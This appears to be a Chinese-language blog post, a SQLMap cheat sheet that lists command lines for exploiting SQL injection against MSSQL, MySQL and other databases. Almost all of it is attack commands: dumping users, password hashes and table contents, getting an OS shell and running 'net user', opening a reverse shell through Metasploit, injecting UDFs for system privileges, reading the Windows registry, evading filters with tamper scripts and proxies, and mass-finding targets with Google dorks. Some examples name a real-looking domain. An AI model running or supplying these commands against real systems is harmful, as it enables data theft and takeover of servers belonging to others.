SQLMap实战

1、实战mssql
    
    python sqlmap.py -u 注入点  判断注入类型

 python sqlmap.py -u 注入点 --is-dba -v 1      判断当前用户是否是dba    

 python sqlmap.py -u 注入点 --users -v 0      列举数据库用户     

 python sqlmap.py -u 注入点 --passwords -v 0   列举数据库密码    
    
 python sqlmap.py -u 注入点 --privileges -v 0      查看用户权限     

 python sqlmap.py -u 注入点 --os-shell        -os-cmd=net user          执行命令    

 sqlmap -u "http://url?id=1"  --current-user  #获取当前用户名称
 sqlmap -u "http://url?id=1"  --current-db    #获取当前数据库名称
 sqlmap -u "http://url?id=1"  --tables -D "db_name" #列表名
 sqlmap -u "http://url?id=1"  --columns -T "tablename" -D "db_name" -v 0 #列字段
 sqlmap -u "http://url?id=1"  --dump -C "column_name" -T "table_name" -D "db_name" -v 0  #获取字段内容

2、基本使用
    
    执行SQL语句 python sqlmap.py -u 注入点 -v 1 --sql-shell

    更详细的信息 python sqlmap.py -u 注入点 -v 5

    POST提交     python sqlmap.py -u 文件路径 --method POST --data 参数

    cookie提交   python sqlmap.py -u 文件路径 --cookie 参数 -v 1

    使用referer欺骗  python sqlmap.py -u 注入点 --referer referer地址 -v 3 

    自定义user-agent 或者使用随机自带的user-agents.txt

     python sqlmap.py -u 注入点 --user-agent "自定义" -v 3
     python sqlmap.py -u 注入点 -v 1 -a "./txt/user-agents.txt"

    使用基本认证  python sqlmap.py -u 注入点 --auth-type Basic --auth-cred "testuser:testpass" -v 3

    使用Digest认证  python sqlmap.py -u 注入点 --auth-type Digest --auth-cred "testuser:testpass" -v 3

    使用代理,配合TOR  python sqlmap.py -u 注入点 --proxy 代理ip

    使用多线程猜解    python sqlmap.py -u 注入点 -v 1 --current-user --threads 3

    绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入

 页面比较
 python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --string "luther" -v 1
 python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --regexp "<td>lu[\w][\w]er" -v 

 排除网站的内容
 python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --excl-reg "Dynamic content: ([\d]+)"

 多语句测试,php内嵌函数mysql_query(),不支持多语句
 python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --stacked-test -v 1

 union注入测试
 python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --union-test -v 1

 unionz注入配合orderby  

 python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1" --union-test --union-tech orderby -v 1

 python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 --union-use --banner
 python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5 --union-use --current-user
 python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 --union-use --dbs

 fingerprint 指纹识别:
 python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 -f
 python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b   

 调用cmd %windir%\system32\cmd.exe 

sqlmap -u "http://www.08sec.com /news?id=1"  --smart  --level 3 --users  # smart 智能 level  执行测试等级     

sqlmap -u "http://www.08sec.com /news?id=1"   --privileges -U root # 查看指定用户权限 

sqlmap -u "http://www.08sec.com /news?id=1"    --roles # 枚举数据库用户角色

sqlmap -u "http://www.08sec.com /news?id=1"   --udf-inject # 导入用户自定义函数(获取系统权限!)

sqlmap -u "http://www.08sec.com /news?id=1"   --dump-all --exclude-sysdbs -v 0 # 列出当前库所有表

sqlmap -u "http://www.08sec.com /news?id=1"   --union-cols #union 查询表记录

sqlmap -u "http://www.08sec.com /news?id=1"   --cookie "COOKIE_VALUE" #cookie 注入

sqlmap -u "http://www.08sec.com /news?id=1"   -b # 获取 banner 信息

sqlmap -u "http://www.08sec.com /news?id=1"  -v 1 -f # 指纹判别数据库类型

sqlmap -u "http://www.08sec.com /news?id=1"  --proxy"http://127.0.0.1:8118" # 代理注入

sqlmap -u "http://www.08sec.com /news?id=1"--string"STRING_ON_TRUE_PAGE"  # 指定关键词 

sqlmap -u "http://www.08sec.com /news?id=1"   --os-pwn #反弹

shell sqlmap -u "http://www.08sec.com /news?id=1"   --reg-read #读取 win 系统注册表

sqlmap -u "http://www.08sec.com /news?id=1"    --dbs-o "sqlmap.log" # 保存进度

sqlmap -u "http://www.08sec.com /news?id=1"    --dbs  -o "sqlmap.log" --resume  # 恢复已保存进度

sqlmap -u "http://www.08sec.com /news?id=1"    --msf-path=/opt/metasploit3/msf2 --os-pwn 反弹 shell 需metasploit 路径

sqlmap -u "http://www.08sec.com /news?id=1"  --tamper "base64encode.py"  加载脚本( 可利用绕过注入限制)

sqlmap -g "google 语法" --dump-all --batch #google 搜索注入点自动 跑出所有字段

实例:

sqlmap -u "http://www.08sec.com /news?id=1&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d 28f489ff1ab5a7531406" --string="Surname" --dbms=mysql --users --password


        
    

posted @ 2023-03-29 22:31  hello_bao  阅读(140)  评论(0)    收藏  举报